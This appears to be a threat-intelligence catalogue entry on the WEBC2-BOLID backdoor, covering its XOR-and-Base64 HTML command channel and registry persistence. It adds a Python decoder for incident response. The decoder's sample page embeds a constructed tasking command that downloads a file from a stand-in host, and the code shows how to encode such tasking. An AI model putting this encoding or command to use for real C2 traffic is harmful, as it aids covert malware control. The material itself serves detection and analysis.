
WEBC2-BOLID (a601e1b0-c0bc-4665-9639-4dc5e588520c)

A WEBC2 backdoor is designed to retrieve a web page from a predetermined C2 server. It expects the web page to contain special HTML tags, and it attempts to interpret the data between those tags as commands. This family of malware is a backdoor capable of downloading files and updating its configuration. Communication with the command and control (C2) server uses a combination of single-byte XOR and Base64-encoded data wrapped in standard HTML tags. The malware family installs a registry key as a persistence mechanism.
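The tasking channel described above (commands hidden between HTML tags, single-byte XOR then Base64) is simple enough to parse from a captured page during incident response. The following is an added example, not code from this entry or from the malware; the marker tags, the XOR key and the page contents are constructed assumptions, since the real WEBC2-BOLID markers are not given here.

```python
import base64
import binascii
import re

# Constructed sample values: the marker tags and the XOR key are assumptions
# for this example; the real WEBC2-BOLID markers are not given on this page.
OPEN_TAG = "<!--bolid-->"
CLOSE_TAG = "<!--/bolid-->"
ASSUMED_KEY = 0x5A

def xor1(data: bytes, key: int) -> bytes:
    """Single-byte XOR; the same call encodes and decodes."""
    return bytes(b ^ key for b in data)

def wrap_command(cmd: str, key: int) -> str:
    """Build one tagged block as the description outlines (XOR, then Base64)."""
    return OPEN_TAG + base64.b64encode(xor1(cmd.encode(), key)).decode() + CLOSE_TAG

def extract_blobs(html: str) -> list[bytes]:
    """Pull the Base64 text between the marker tags and decode it; skip junk."""
    pat = re.escape(OPEN_TAG) + r"(.*?)" + re.escape(CLOSE_TAG)
    blobs = []
    for text in re.findall(pat, html, re.DOTALL):
        try:
            blobs.append(base64.b64decode(text.strip(), validate=True))
        except (ValueError, binascii.Error):
            continue  # not a well-formed tasking block, ignore it
    return blobs

def decode_commands(html: str, key: int) -> list[str]:
    """Recover the plaintext commands once the sample's XOR key is known."""
    return [xor1(b, key).decode("ascii", errors="replace") for b in extract_blobs(html)]

def key_candidates(blob: bytes) -> list[int]:
    """Keys under which the whole blob decodes to printable ASCII (0x20-0x7e)."""
    return [k for k in range(256) if all(0x20 <= c <= 0x7E for c in xor1(blob, k))]

# Constructed page: benign HTML with two tasking blocks hidden in comments.
SAMPLE_PAGE = (
    "<html><body><p>Welcome</p>"
    + wrap_command("download http://update.invalid/u.bin", ASSUMED_KEY)
    + "<p>Footer</p>"
    + wrap_command("setinterval 600", ASSUMED_KEY)
    + "</body></html>"
)

if __name__ == "__main__":
    for cmd in decode_commands(SAMPLE_PAGE, ASSUMED_KEY):
        print(cmd)
```

When the key is not yet known from the sample, `key_candidates` narrows a captured blob to the few keys that yield printable text, which is usually enough to spot the real tasking by eye.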

Cluster A                                           Galaxy A   Cluster B                                           Galaxy B   Level
WEBC2-BOLID (a601e1b0-c0bc-4665-9639-4dc5e588520c)  Tool       WebC2-Bolid (71292a08-9a7b-4df1-b1fd-7d80a8fcc18f)  Malpedia   1